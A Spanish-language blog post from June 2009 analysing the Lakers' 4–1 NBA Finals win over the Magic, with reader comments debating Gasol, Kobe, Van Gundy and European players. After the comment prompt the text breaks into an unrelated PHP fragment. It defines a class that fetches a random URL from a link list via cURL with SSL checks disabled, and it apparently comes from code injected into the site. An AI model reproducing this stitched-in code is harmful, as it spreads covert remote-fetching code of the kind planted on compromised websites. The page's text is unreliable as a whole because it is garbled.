Lakers 4 – Magic 1: Habemus campeón

16 de June de 2009 por TheDeerHunter

Habemus campeón. Ya lo sabéis de sobra todos los que pasáis por aquí. Apenas han pasado poco más de 24 horas y ya se ha dicho todo. Ya se ha exprimido cada gesto, cada detalle hasta llegar a la polarización típica por estas fechas. Ensalzar a unos campeones que suben un escalón de la leyenda y desollar sin piedad a los perdedores, hasta hace bien poco el equipo revelación de la temporada y el justo vencedor del más “salvaje Este” desde que colgó “su majestad” las botas . A nosotros no nos queda más que aportar nuestra modesta visión de lo que ha pasado, en relación al pronóstico que aventuramos en su día a fin de evaluar a toro pasado lo acertadas o equivocadas que eran en aquel momento nuestras impresiones.

No hay duda de que este anillo será recordado como el de Kobe, como si nada hubiera logrado hasta la fecha. Su emancipación definitiva (o no) de la alargada sombra de Shaq y Jordan. Eterno reo de todos los juicios, ni siquiera la cuarta máxima producción anotadora de toda la historia de las finales le ha librado de los dedos acusadores. De él molesta todo, hasta que sea humano. Indudablemente ha cometido errores, alguno de bulto. Indiscutiblemente tiene defectos y también limitaciones. Pero con todas las horcas esperando ansiosas hacer efectiva la sentencia, Kobe soporta solícito con todas las implicaciones lo bueno pero también lo malo (que ya habrá tiempo de comentar en otras ocasiones). Esta guerra jamás la tendrá ganada, por muchas batallas que libre victorioso.

Aquí lo recordaremos especialmente como el anillo con el que Gasol mató al “Blando”. Ni él mismo hubiera soñado nunca alcanzar el umbral físico con el que se ha topado, precisamente en el momento definitivo de la campaña. No hace mucho él y todos mostrábamos preocupación por la carga de minutos a la que era sometido, conociendo su precaria resistencia. Phil Jackson nos respondía a todos con desprecio y una vez más los dioses le dan la razón al maestro, que ha sabido exprimir al de Sant Boi como nadie había hecho, liberándolo así de todo límite. En los próximos años será estudiada con minucia la defensa que aplicó a un Superman Howard un tanto bisoño. El que está llamado a ser el mejor pívot de la década ha claudicado completamente ante el #16 amarillo. La actuación trasciende lo secundario y se acerca a lo mítico, escribiendo definitivamente su nombre en letras dorado y púrpura muy cerca de los Mikan, Chamberlain, Abdul-Jabbar y Shaquille Oneal, salvando las distancias, por supuesto.

Esta final también será recordada por el enésimo “Big Shot Fish”, la flor de Jackson… castigo cruel a los imprudentes experimentos de Stan Van Gundy y a su ingratitud para con Rafer Alston. El esperado regreso de Nelson sólo ha aportado inestabilidad a una posición sensible que, hasta el momento había estado más que bien defendida por los bases disponibles. Esa es sólo la punta del iceberg de un cúmulo de errores que despierta a la inexperiencia de un bonito sueño. Lo que hubiera cambiado todo de anotar Lee ese audaz Alley-hoop que ideó el técnico que ahora es el mismísimo demonio en Florida. Todo es circunstancial, todo es efímero. Llamadme iluso si queréis, pero yo tampoco hubiera ordenado esa fatídica falta. Tampoco la ordenó Larry Brown con Detroit en el 2004. Ni falta que le hizo.

Del resto de la serie hemos podido leer aspectos más secundarios. El gran hacer en su “contract year” de Odom, Ariza y también de Turkoglu. Rashard Lewis, en cambio, no ha terminado de resultar factor fiable aunque sería injusto olvidar lo fundamental que ha sido para alcanzar este punto y para conseguir  la primera y de momento única victoria en las finales de la historia de la franquicia. Sí ha intentado serlo Mickael Pietrus, por lo civil o por lo criminal. Culpa suya y sólo suya es que su actuación sólo será recordada por el garrotazo asesino a Gasol con los dos puños. Lo cierto es que ya ni me acuerdo si lo hizo bien o mal en lo demás, sólo sé que Kobe le ha cosido a puntos. Por último preocupante lo verdes que se han mostrado Bynum, Vujacic o Farmar para este tipo de empresas. Mal lo tiene Lakers si este es realmente el futuro sobre el que descansa la posibilidad de que las repitan en los años sucesivos… y sin embargo logran ganar sin necesidad de su concurso ¿Tanta es la diferencia?

Comenta

17 comentarios a esta entrada

  1. Kantonyo dice:
    #1

    Justo vencedor Los Angeles Lakers de esta temporada, de este modo quitandose la espina clavada de la final contra Boston, sobre todo por el último partido.

    Pau Gasol sorprendentemente sigue creciendo temporada a temporada, con lo dificil que es hacerse un hueco entre los más grandes siendo Europeo. Por cierto ni Sabonis, ni Petrovic, ni Nowitzki han conseguido un anillo. Solo Parker y Kukoc de los ‘grandes’ han alcanzado ese éxito que recuerde.

    Hay que ser justo con Orlando y con Van Gundy, han tenido una temporada espectacular. Si no hubiera sido por la lesión de Nelson, hubieran conseguido un record de victorias parecido a los Lakers-Cavs. Y cuando todo indicaba que la plantilla se habia desmoralizado. Orlando y Van Gundy eliminaron a los campeons y a los grandes favoritos.

    El gran error de Stan, posiblemente haya sido querer precipitar la vuelta de Nelson, y de este modo desconfiar de Alston.

    Pero hay que ser justos, a mi parecer, la única posiblidad que tenían los Magic de ganar, era conseguir que Nelson volviera al nivel antes de su lesión.

    Los números de Alston han sido pésimos en la final y tampoco han sido gran cosa en los otros partidos de los playoffs: 106/279 en tiros de campo, 36/113 en 3p, sólo 4 asistencias por partido, casi 2 balones perdidos por encuentro, a su favor dos grandes actuaciones con victoria ante Cavs y Lakers.

    Pero lo que está totalmente claro es que Nelson no estaba para jugar ni un sólo minuto, y por ello creo que ha sido el gran error de Van Gundy, no tenía otro remedio que confiar en Alston y no lo hizo.

    Pero es una simple anectoda a la labor de este entrenador, para mí el que más merito ha tenido de toda la temporada.

      Citar

  2. TheDeerHunter dice:
    #2

    Me parece bien ser justo con Stan Van Gundy… al cesar lo que es del cesar. El ser justo también es analizar sus errores y, por cómo le están tratando por su pueblo, parece claro que los ha tenido. Y no voy a entrar en la dichosa falta…
    El error de Alston me parece increíble. Todos conocemos qué perfil tiene este jugador y no es precísamente un generador de números ¿resumen esos números su aportación desde que llegó al equipo?? a nadie le he oído quejarse de su rendimiento. Más bien al contrario… es uno de los factores que ha permitido a Orlando marcarse la segunda vuelta que ha hecho sin Nelson disponible, y de paso produciendo en algunos partidos vitales de estos playoffs.
    Ahora bien, si consideramos que sin él Orlando no tenía ninguna opción de ganar entiendo que SVG se la haya jugado. Pero que se la hubiera jugado con todas las consecuencias y que no maree… ni siquiera lo ha tenido claro en ese sentido. Han llegado a jugar de base Turkoglu y Reddick (que esa es otra) Ya hace falta ser duro para hacer lo que hizo Alston en el 3º. Si Van Gundy hubiera sido listo se hubiera dado cuenta de lo mucho que está sufriendo Fisher contra cualquier base correoso y rápido (casualmente como Alston) y le planta a Nelson que no le ha exigido absolutamente nada a Fisher en ese sentido. Un suicidio y un navajazo bestial a Alston que debería haber ponderado mejor, al menos asegurándose que Nelson podía responder mínimamente. ¿En qué situación queda Alston ahora mismo?? Contento lo deben de tener.
    Pero es que luego va y mueres precísamente por ahí. Un montón de pérdidas que te hacen perder los partidos decisivos… y el triple de Fisher. El destino es cruel… o justo, según se lo preguntes a Aslton o a Van Gundy.

    Vaya por delante que en mi opinión era tan necesario Nelson contra Lakers como lo era contra Cavaliers. Nadie le echó en falta entonces. Como dijo alguien hace poco… si Nelson fuera Isiah Thomas lo entendería, pero no es tanto, por muy bien que haya jugado antes de la lesión.

      Citar

  3. telekoman dice:
    #3

    Hombre, al margen de los errores que haya podido cometer SVG, los aficionados de Orlando deberían tener algo más de perspectiva, pero claro, eso es algo que no suele sobrar en el mundo del deporte. Si a cualquier aficionado le hubieran dicho al empezar la temporada que iban a ser el tercer mejor equipo del Este de la Liga Regular, y que iban a dejar por el camino a Celtics y a Cavaliers, pero que no se les podía garantizar que ganaran el anillo, hubieran firmado sin dudarlo un momento.
    Veremos cual es el futuro de este hombre en Orlando, y más teniendo en cuenta que algún jugador importante (Turkoglu) parece querer irse a sitios donde le ofrezcan más pasta.

    Por otro lado, los Lakers han hecho lisa y llanamente lo que tenían que hacer. Ni más ni menos. Teniendo en cuenta que la plantilla es ligeramente corta (6 jugadores y morralla), lo conseguido es grande. Veremos ahora en el momento de las renovaciones…
    Yo si fuera el MG de los Lakers, tiraba de talonario y pagaba la clausula de rescisión de Lebron y de Howard para la temporada que viene…..Ay que no, que ni esto es futbol, ni los Lakers son el Madrid, ni Kupchap (o como se diga) es Florentino.

    Y que viva Gasol y la madre que lo parió.

      Citar

  4. Jabho dice:
    #4

    Todo es cuestión de sensaciones y la de Orlando es que no han dado la talla en las finales… hay formas y formas de palmar. Dicho esto no estuvieron bien contra Sixers, tampoco contra los verdes y sólo supieron jugar y bien la eliminatoria contra los Cavs… En fin, finalistas pero con mal feelling.

    Los Lakers justo al revés. La serie contra los Rockets les dejo la imagen tocada… contra Denver pasaron mucho apuros pero fueron más solventes y en la final mucho más contundentes. De menos a más y acabando con mucha sensación de superioridad.

    Si el listón de medir a Kobe es Jordan o Shaq la cosa ya va bien. Y yo soy céltico, pero es muy bueno…. Además creo que Pau y él son muy compatibles, especialmente por caracteres y egos.

    Y por último felicitar al tipo que más ha hecho y trabajado por este anillo de los Lakers: Chris Wallace 😉

      Citar

  5. Viva_Dirk dice:
    #5

    Solamente queria puntualizar una cosa que ha dicho Kantonyo, ‘ni Sabonis, ni Petrovic, ni Nowitzki han conseguido un anillo’, a lo que yo digo que ninguno de ellos tuvo en su equipo a un jugador del nivel de Kobe, ni del nivel de Kobe ni cerca de ese nivel.

    De hecho, a Sabonis lo único que le impidió ganar un anillo fue cruzarse con Kobe&Shaq.

      Citar

  6. MagicJohnson32 dice:
    #6

    Viva, no creo que Kantonyo estuviese comparando a Pau con ellos, sino destacando la dificultad y el honor que supone ganar un anillo siendo parte fundamental de un equipo.

    Sabonis no ganó un anillo por aquellos últimos 10 minutos del séptimo partido del 2000, y Dirk no lo ganó porque los Mavs se esfumaron cuando lo tenían en la mano ante Miami. Es decir: ¡qué difícil es ganar un Anillo!

    Yo creo que los Lakers han confirmado lo que se venía intuyendo durante la regular: que sólo necesitaban estímulos para dar mucho más de sí mismos. Es algo que viene en el ADN de algunos de sus jugadores. Ya sabemos que Gasol reserva su mejor versión defensiva para las grandes citas, que Fisher es un especialista en big shots, y que Odom es el Guadiana en versión Point-Forward. Además, Ariza ha dado un paso adelante impresionante en el momento más oportuno.

    Luego están Kobe y Phil, a quienes el anillo les hace mucha justicia. Ambos merecen un lugar muy destacado en la historia y este título es un paso más hacia él.

      Citar

  7. TheDeerHunter dice:
    #7

    De Petrovic no sé porque no me acuerdo… pero de lo que no se han podido quejar ni Sabonis ni Nowitzki es de equipo y de compañeros.

      Citar

  8. Kantonyo dice:
    #8

    Efectivamente, no queria compararlos, para mi Sabonis, Petrovic y Nowitzki, siguen siendo los tres mejores jugadores europeos de siempre. Pero creo que Gasol temporada a temporada, está cada vez más cerca, es campeón del mundo, subcampeón olimpico tratando de iguales a USA, y ahora el anillo.

    Además creo que ha sido injusto no incluirle en el primer o segundo quinteto de la liga esta temporada, para mi ha sido el ala-pívot más decisivo de la liga, mucho más este año que Dirk o Duncan.

      Citar

  9. Dantley2 dice:
    #9

    Claro que ganar un anillo es dificilísimo. Lo gana cada año un solo equipo y grandes como Stockton&Malone, Barkley o Patrick Ewing. Y de esta generación se irán probablemente sin ganarlo gente como Nowitzki. Lo que pasa es que a veces hay que tener la suerte de estar en el lugar adecuado en el momento preciso. El ejemplo clásico de hacer eso fue Robert Horry. El ejemplo clásico de hacer todo lo contrario fue Adrian Dantley.

    Gasol no sólo ha estado, sino que ha sido decisivo. ¿Lo habrían ganado si el Gasol hubiera sido Marc? Probablemente no, pero ese trade se hizo y sin él quizá Kobe seguiría amargado con las críticas “idiotas” y Pau amargado con aquella estupidez (deportiva, que no económica) de haber renovado el contrato con un equipo que jamás le iba a dar esto.

    Del tema Van Gundy, no me gusta, me parece demasiado cerrado, pero oye, es el mismo que hizo lo que debía para ganarle a los Cavaliers. Él tampoco puede meterle a Howard ni la inteligencia ni los 5 o 6 años de experiencia que le habrían hecho falta para no haberse dejado comer por Gasol. Eso sí, el tema Nelson/Alston pasará a la historia como un ejemplo de cómo no gestionar un grupo.

    De los secundarios creo que sólo Ariza y Odom son parte fundamental del título. Fisher metió un triple decisivo, y no es la primera vez, de acuerdo, pero por lo poco que he visto creo que ya no está para estas cosas. Que sea el típico veterano que te juegue 10 minutos, puede ser, pero es un chollo ya para los rivales.

    El año que

      Citar

  10. TheDeerHunter dice:
    #10

    Pues por lo visto, Jabho… al que le han agradecido bien los servicios es a Kevin McHale que ha pasado a engrosar las largas listas del paro… será que por fin han valorado el grandísimo traspaso de KG a Boston y la mitad del último anillo de sus ex

      Citar

  11. Viva_Dirk dice:
    #11

    Bueno Deer, que no puedan quejarse de equipo no contradice lo mio, yo he dicho que nunca han tenido al lado a un jugador del nivel de Kobe y añado que tampoco han sido entrenados por un tio que antes habia ganado 9 anillos.

    Es mas, Nowitzki jamás ha tenido un compañero del nivel de Gasol, sea porque los entrenadores los infrautilizaban(caso de Nash) o porque confeccionaban mal la plantilla(caso Jamison/Walker).

      Citar

  12. TheDeerHunter dice:
    #12

    No digo que no sea así… sólo que me hubiera gustado en su día haber oido algún comentario similar valorando la calidad de los compañeros de Gasol cuando se decía de él que era un looser por no haber ganado ni un partido de playoffs con una banda contra equipazos como los Spurs y los Mavs (de Nowitzki)

    Desde luego no tengo dudas de que la causa de que Nowitzki y Sabonis no hayan llegado a ganar un anillo ha sido más una cuestión hazarosa que cualquier otra consideración. Aún con todo, este anillo, bajo mi punto de vista pone a Gasol a la altura de Sabonis, Nowitzki, Petrovic o cualquier otro grande que se os ocurra (dudo si meter en este saco a Parker) y supera en mucho a algunos otros ilustres como Kukoc, Divac, Radja, Stojakovic, Marciulennis, Smits, Djordjevic, Jasikevicius…

      Citar

  13. Gallis dice:
    #13

    Mmmm, porque no metéis a Kukoc en la lista que forman Sabonis, Petrovic y Nowitzky??? Para mí, sin duda forma parte de la más selecta lista de jugadores europeos, junto con Gasol.

    Por cierto Jabho, por más que lo repitas una y otra vez, no cuela, jeje…e insisto, la final del año pasado, con este Ariza y este Bynum, me gustaría jugarla, jeje…

      Citar

  14. Viva_Dirk dice:
    #14

    Kukoc también ganó anillos y títulos con la selección, y que cojones que era uno de esos tipos por los que te quedabas a ver los partidos. Desde luego yo lo pondria en el grupo de Gasol en el que también está Parker nos guste o no.

    Nowitzki y Sabonis para mi están a otro nivel, en el que no está Petrovic porque desgraciadamente no pudimos verle mas años en la NBA.

    Ah! A mi siempre me pareció que meter a aquellos Grizzlies en playoffs ya era mérito mas que suficiente.

      Citar

  15. TheDeerHunter dice:
    #15

    Coincido con lo de Petrovic… podemos mantenerle al margen de todo esto.
    Con Sabonis pasa un poco lo mismo… solo se puede considerar a Sabonis como jugador de otro nivel de Gasol si hablamos de cuando tenía el talón de Aquiles sano. En ese punto a mí me hubiera gustado compararlo con Olajuwon o con Shaquille… y sí, era de otro nivel. El Sabonis que jugó en la ACB y en la NBA era un jugador increíble pero mermado y no me parece tan “a otro nivel” de entre los grandes europeos (simplemente al máximo nivel, eso sí)

    Con Nowitzki… no creo que esté a otro nivel que Gasol. Hemos visto batallas entre ellos por muchas cosas y bastantes las ha ganado Gasol. Nowitzki le supera en el plano individualmente ofensivo. Diría que en cualquier otra faceta gana la partida Gasol. El resumen de sus carreras hasta la fecha lo dice todo. Uno con un MVP el otro con un anillo. Empate técnico.

    De Parker… pues seguramente tiene todo para meterse en el grupo. Desconfío de sus actuaciones en otros ámbitos sin “papá” Duncan al lado, eso es todo. En ningún caso pongo en duda que es uno de los grandes… hay niveles y niveles.

    De Kukoc… no puedo decir nada en su contra. Otro grande. Pero el peso que le correspondía en esos Bulls que le hicieron campeón no es el de Gasol, o Nowitzki… ni siquiera el de Petrovic, Sabonis o Parker. Después de aquello tampoco tuvo nunca mucho más protagonismo en la NBA.

      Citar

  16. Kantonyo dice:
    #16

    Sabonis tuvo el gran handicap de los problemas extradeportivos. Siempre nos quedará la duda que hubiera pasado si hubiera empezado a jugar en la NBA con 22 años, cuando fue elegido en el Draft. En cambio no debutó hasta 10 años depués con 32 años, para un pívot con su altura los problemas físicos hacen mella.

      Citar

  17. Jabho dice:
    #17

    Gallis, yo no he dicho nada al menos en este foro, pero sí, me quedo con la duda de que con Garnett bien que hubiera pasado…. Yo de los Celtics me quedo con muy, muy buena sensación de estos PO. Con suerte nos vemos el año que viene…

    A los Lakers les he seguido menos y al final han ganado de forma muy contundente, pero mira a mime dejan un amago de duda qué le voy a hacer.

    Kukoc es un grande al nivel de cualquier europeo. Y Petrovic tb… Vamos con Sabas y Dirk la primera linea de parrilla, y luego ya Marciulennis, Gasol y algún otro.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>